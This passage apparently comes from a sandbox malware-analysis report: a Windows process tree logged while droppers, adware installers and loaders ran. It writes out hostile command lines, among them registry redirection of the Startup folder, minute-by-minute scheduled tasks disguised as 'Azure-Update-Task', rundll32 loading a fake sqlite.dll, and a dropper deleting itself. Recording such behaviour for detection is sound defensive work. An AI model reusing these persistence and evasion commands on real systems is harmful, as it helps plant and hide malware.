      - C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe
        
        "C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe"
        6⤵
        
        PID:6404
        
        C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe
        
        "C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe" -q
        7⤵
        
        PID:3012
    - - C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
        5⤵
        
        PID:4200
      - C:\Users\Admin\AppData\Local\Temp\tmp30DB_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp30DB_tmp.exe"
        6⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        7⤵
        
        PID:6552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
        7⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        8⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
        9⤵
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        Esplorarne.exe.com i
        9⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        10⤵
        
        PID:7208
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        11⤵
        
        PID:7336
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        12⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        13⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        14⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        15⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        16⤵
        
        PID:8444
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        17⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        18⤵
        
        PID:9148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        19⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        20⤵
        
        PID:8752
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        21⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        22⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        23⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        24⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        25⤵
        
        PID:8476
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        26⤵
        
        PID:8656
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        27⤵
        
        PID:9092
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        28⤵
        
        PID:8752
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        29⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        30⤵
        
        PID:8956
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        31⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        32⤵
        
        PID:8760
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        33⤵
        
        PID:8692
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        34⤵
        
        PID:9148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        35⤵
        
        PID:8976
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        36⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        37⤵
        
        PID:9052
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        38⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        39⤵
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        40⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        41⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        42⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        43⤵
        
        PID:8364
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        44⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        45⤵
        
        PID:9040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        46⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        47⤵
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        48⤵
        
        PID:8332
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        49⤵
        
        PID:8348
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        50⤵
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        51⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        52⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        53⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        54⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        55⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        56⤵
        
        PID:7592
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        57⤵
        
        PID:8960
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping RJMQBVDN -n 30
        9⤵
        Runs ping.exe
        
        PID:7388

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6188
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:64

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5532
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5532 -s 496
  2⤵
  - Program crash
  PID:6264

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5236
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D592C6EA5D059E3009A9E98343973CA4 C
  2⤵
  PID:5588
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9B0966B8C2621AD2847D818F4080D694 C
  2⤵
  PID:5340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 21B5A5F3385E9A790BF83DA1D6B99A5B
  2⤵
  PID:6724
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9F03233409AE1A3FDBBAD2E971E88F4B C
  2⤵
  PID:7988
- C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
  2⤵
  PID:7592
- - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
    3⤵
    PID:6600
  - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
      4⤵
      PID:5952
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b0,0x1e8,0x7ff8426fdec0,0x7ff8426fded0,0x7ff8426fdee0
        5⤵
        
        PID:9080
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=1700 /prefetch:8
        5⤵
        
        PID:476
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=2124 /prefetch:8
        5⤵
        
        PID:4776
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
        5⤵
        
        PID:5124
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2488 /prefetch:1
        5⤵
        
        PID:3076
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2464 /prefetch:1
        5⤵
        
        PID:6788
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=3260 /prefetch:8
        5⤵
        
        PID:7520
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3292 /prefetch:2
        5⤵
        
        PID:4740
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=3576 /prefetch:8
        5⤵
        
        PID:9692
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=3268 /prefetch:8
        5⤵
        
        PID:9804
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=1992 /prefetch:8
        5⤵
        
        PID:7944
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=820 /prefetch:8
        5⤵
        
        PID:9036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DDC2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
    3⤵
    PID:7128

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7676
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7712

C:\Users\Admin\AppData\Local\Temp\BC9D.exe
C:\Users\Admin\AppData\Local\Temp\BC9D.exe
1⤵
PID:7084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5856

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7764

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8704

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9008
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{67417d53-58e3-6942-993e-534d8bf70365}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:9068
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:7292

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:8692

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Executes dropped EXE
PID:3340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\7CF0.exe
C:\Users\Admin\AppData\Local\Temp\7CF0.exe
1⤵
PID:9068

C:\Users\Admin\AppData\Local\Temp\9B18.exe
C:\Users\Admin\AppData\Local\Temp\9B18.exe
1⤵
PID:4716
- C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
  "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
  2⤵
  PID:8384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
    3⤵
    PID:7676
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
      4⤵
      PID:8528
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:8036

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9120
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\F58D.exe
C:\Users\Admin\AppData\Local\Temp\F58D.exe
1⤵
PID:8084
- C:\Users\Admin\AppData\Local\Temp\rkOS8bDH6M.exe
  "C:\Users\Admin\AppData\Local\Temp\rkOS8bDH6M.exe"
  2⤵
  PID:3152
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    - Creates scheduled task(s)
    PID:7636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F58D.exe"
  2⤵
  PID:7736
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:1764
- C:\Users\Admin\AppData\Local\Temp\DaorUtB9VO.exe
  "C:\Users\Admin\AppData\Local\Temp\DaorUtB9VO.exe"
  2⤵
  PID:9092
- - C:\Windows\SysWOW64\cmd.exe
    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
    3⤵
    PID:9144

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:8112
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:7824

C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
1⤵
PID:7304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
